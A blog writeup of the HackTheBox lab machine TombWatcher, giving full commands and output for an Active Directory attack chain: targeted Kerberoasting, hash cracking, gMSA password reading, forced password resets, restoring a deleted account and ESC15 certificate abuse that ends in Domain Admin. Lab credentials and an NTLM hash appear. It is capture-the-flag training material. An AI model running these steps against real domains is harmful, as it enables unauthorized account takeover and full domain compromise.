Post

HackTheBox TombWatcher Writeup

Posted Updated
TombWatcher HTB — blog writeup cover
TombWatcher HTB — blog writeup cover
By Mohamed Mahmoud
7 min read
HackTheBox TombWatcher Writeup

Machine Information

As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

$User_flag

Nmap Scan

1

sudo nmap -Pn -T4 -A -open -p- -sC -sV -oA nmap.txt 10.10.11.72

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-06 17:30:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-08-06T17:31:55+00:00; +4h00m01s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-06T17:31:54+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-08-06T17:31:55+00:00; +4h00m01s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-08-06T17:31:54+00:00; +4h00m00s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
49732/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-06T17:31:15
|_  start_date: N/A
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 3h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   166.59 ms 10.10.16.1
2   166.87 ms 10.10.11.72

After some digging around and some tries with many ports , I realized BloodHound is the key to solving this box i loading BloodHound, the attack path from Henry was clear just everything was ready to hacked. start with Shortest Paths to High Value Targets bloodhound1 The attack path was clear every user and group along the chain had the right privileges to reach the target.

Bloodhound 0x1

Started recon with BloodHound to enumerate all AD objects:

1

bloodhound-python -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' -gc tomb-dc.tombwatcher.htb -ns 10.10.11.72 -c all --zip

This collects all information (users, groups, sessions, ACLs, etc.) and saves it in a zip file to analyze in the BloodHound GUI. bloodhound2 I found the that HENRY has write access to the servicePrincipalName of ALFRED, which can be abused for Kerberoasting write permissions

Abuse SPN via LDAP Write Permissions

  • Create the .ldif file to add a fake SPN
    1
2
3
4

    dn: CN=ALFRED,CN=Users,DC=tombwatcher,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: fake/alfsvc
  • Add a fake SPN to ALFRED via LDAP.
    1

    ldapmodify -x -H ldap://10.10.11.72 -D "CN=HENRY,CN=Users,DC=tombwatcher,DC=htb" -w 'H3nry_987TGV!' -f add_spn.ldif
  • Request a TGS ticket for that SPN.
    1

    impacket-GetUserSPNs tombwatcher.htb/HENRY:'H3nry_987TGV!' -dc-ip 10.10.11.72 -request
  • Crack the TGS offline using hashcat or john to get ALFRED’s password.
    1

    hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

    offline Once cracked, we got access to ALFRED, moving one step closer to full domain compromise and continue with alfred crednetials

We run BloodHound again after each new user because it updates our attack paths based on the new permissions and group memberships revealing new ways to escalate.

Bloodhound 0x2

Using Alfred’s credentials, we ran BloodHound again to uncover new attack paths from his perspective.

1

bloodhound-python -d tombwatcher.htb -u alfred -p 'basketball' -gc tomb-dc.tombwatcher.htb -ns 10.10.11.72 -c all --zip

bloodhound3 From Alfred’s account, we had permission to add users to the INFRASTRUCTURE group. We used BloodyAD to add my Alfred to it:

1
2
3

bloodyAD --host '10.10.11.72' -d 'dc01.TOMBWATCHER.HTB' -u 'alfred' -p 'basketball'  add groupMember 'INFRASTRUCTURE' alfred

[+] alfred added to INFRASTRUCTURE

This gave us the next step in our escacdlation path.

Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great) It means your machine’s clock is out of sync with the domain controller and Kerberos hates that. Fix it with:

1
2

sudo systemctl stop systemd-timesyncd
sudo ntpdate 10.10.11.72

This stops the system time service and manually syncs your clock with the DC (10.10.11.72), so you can get Kerberos tickets properly again.

ReadGMSAPassword on ANSIBLE_DEV$

After joining the INFRASTRUCTURE group, we gained the ReadGMSAPassword privilege on the Group Managed Service Account ANSIBLE_DEV$@TOMBWATCHER.HTB bloodhound4

1

ldeep ldap -d "dc01.tombwatcher.htb" -u "alfred" -p "basketball" -s ldaps://10.10.11.72 gmsa

ldeep We obtained the NTLM hash of the ansible_dev$ machine account, allowing us to proceed with the next step in our path attack.

Bloodhound 0x3

again and again and agian …that is time with ansible_dev

1

bloodhound-python -u 'ansible_dev$'  --hashes ':7bc5a56af89da4d3c03bc048055350f2' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip

bloodhound5 We discovered that ANSIBLE_DEV$@TOMBWATCHER.HTB can reset SAM’s password without needing the current one.

ANSIBLE_DEV$ Change SAM’s Password

1

python3 ~/Downloads/impacket/examples/changepasswd.py -dc-ip 10.10.11.72 -altuser ansible_dev$ -althash :7bc5a56af89da4d3c03bc048055350f2 -reset 'tombwatcher.htb/SAM@10.10.11.72'

When prompted, we set a new password for SAM: set_password now we could change the sam user password.

Bloodhound 0x4

This time with SAM

1

bloodhound-python -u 'sam'  -p 'sam_pass' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip

writeowner

SAM Can Take Over JOHN

The user SAM@TOMBWATCHER.HTB can change the owner of JOHN@TOMBWATCHER.HTB.

1
2
3
4
5
6
7
8

ldap_shell tombwatcher.htb/SAM:sam_pass -dc-ip 10.10.11.72

# set_owner "CN=john,CN=Users,DC=tombwatcher,DC=htb"
# set_genericall "CN=john,CN=Users,DC=tombwatcher,DC=htb" sam
# change_password john NewPassword123!
[INFO] Detected insecure connection, attempting to start StartTLS...
[INFO] StartTLS successfully activated!
[INFO] Password changed successfully for "john"! New password: "NewPassword123!"

we can take Control of JOHN and Requesting a TGT. tgt so what Next…

Now that we fully control JOHN@TOMBWATCHER.HTB, we discovered he has the capability to create a PSRemote session with the Domain Controller DC01.TOMBWATCHER.HTB This allows us to Enter an interactive PowerShell session on the DC personate

1

evil-winrm -i dc01.tombwatcher.htb -u john -p 'NewPassword123!'

evil

#Root_flag

Let’s check if John has anything leading to Administrator. We found AD CS, which is good, but not enough , so we’ll look for deleted or unusual user accounts to investigate further. root1

1

 Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties *

root2 We found a deleted user, cert_admin perfect. Let’s restore the account and run BloodHound again to explore new attack paths.

1

Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"

root3 Now, we’ll use bloodyAD to remove the ACCOUNTDISABLE flag from cert_admin, reactivating the account for use

1

bloodyAD -d tombwatcher.htb -u john -p 'NewPassword123!' --host 10.10.11.72 remove uac cert_admin -f ACCOUNTDISABLE

we’ll use bloodyAD to set a new password for cert_admin, giving us direct access to the account.

1

bloodyAD --host 10.10.11.72 -u john -p 'NewPassword123!' -d tombwatcher set password cert_admin HackTheBox

Let’s check if the cert_admin account exists and is active. root4 Now, let’s check if there are any vulnerable certificate templates available for exploitation.

1

certipy find -u 'cert_admin' -p 'HackTheBox' -dc-ip '10.10.11.72' -vulnerable -text -enabled

root5 let’s exploit it using ESC15

ESC15: Vulnerable CT Abuse

Using the vulnerable WebServer certificate template, we requested a certificate for administrator@tombwatcher.htb

1
2
3
4
5
6

certipy req \
    -u 'cert_admin@tombwatcher.htb' -p 'HackTheBox' \
    -dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -upn 'administrator@tombwatcher.htb'  \
    -application-policies 'Client Authentication'

root6 authenticated with it, and reset the Administrator password .

1

certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell

gaining full Domain Admin access. last

Thanks for Reading , see you in the next writup!!!

HTB, Machines
Windows ADCS CVE AD
This post is licensed under CC BY 4.0 by the author.